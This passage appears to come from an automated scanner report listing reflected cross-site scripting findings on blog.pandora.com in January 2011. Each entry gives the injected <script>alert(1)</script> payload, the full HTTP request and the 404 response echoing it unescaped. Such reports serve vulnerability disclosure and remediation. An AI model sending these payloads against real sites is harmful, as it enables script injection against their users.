The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd53e<script>alert(1)</script>7f56f5a8144 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html was not found on this server.</p>
...[SNIP]...

3.316. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/holiday-music.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>e925b373d1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html was not found on this server.</p>
...[SNIP]...

3.317. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/holiday-music.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e86cc<script>alert(1)</script>2286b5dabd7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 was not found on this server.</p>
...[SNIP]...

3.318. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/themed-stations.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d3cd<script>alert(1)</script>a8a76e357fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html was not found on this server.</p>
...[SNIP]...

3.319. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/themed-stations.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25283<script>alert(1)</script>32ad766d12b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html was not found on this server.</p>
...[SNIP]...

3.320. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/themed-stations.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac8ae<script>alert(1)</script>07d5f78715a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html was not found on this server.</p>
...[SNIP]...

3.321. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/themed-stations.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f003<script>alert(1)</script>c2c8f4a2ec0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html was not found on this server.</p>
...[SNIP]...

3.322. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/12/themed-stations.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1b2a<script>alert(1)</script>283fea933c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 was not found on this server.</p>
...[SNIP]...

3.323. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/arizona/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ed28<script>alert(1)</script>2b8c9060753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ was not found on this server.</p>
...[SNIP]...

3.324. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/arizona/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43add<script>alert(1)</script>997001f8093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ was not found on this server.</p>
...[SNIP]...

3.325. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/arizona/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f01a6<script>alert(1)</script>b621b2a3f06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ was not found on this server.</p>
...[SNIP]...

3.326. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/california/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70767<script>alert(1)</script>cc798d55c4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ was not found on this server.</p>
...[SNIP]...

3.327. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/california/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d529c<script>alert(1)</script>b54dc99c7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ was not found on this server.</p>
...[SNIP]...

3.328. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/california/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d9cb<script>alert(1)</script>1d67bc84c6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 352
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ was not found on this server.</p>
...[SNIP]...

3.329. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/colorado/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31f0f<script>alert(1)</script>5b0b1194bdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ was not found on this server.</p>
...[SNIP]...

3.330. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/colorado/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b9f5<script>alert(1)</script>be7f68e6c8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ was not found on this server.</p>
...[SNIP]...

3.331. http://blog.pandora.com/pandora/archives/colorado/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/colorado/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5a5f<script>alert(1)</script>64acfed229b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ was not found on this server.</p>
...[SNIP]...

3.332. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
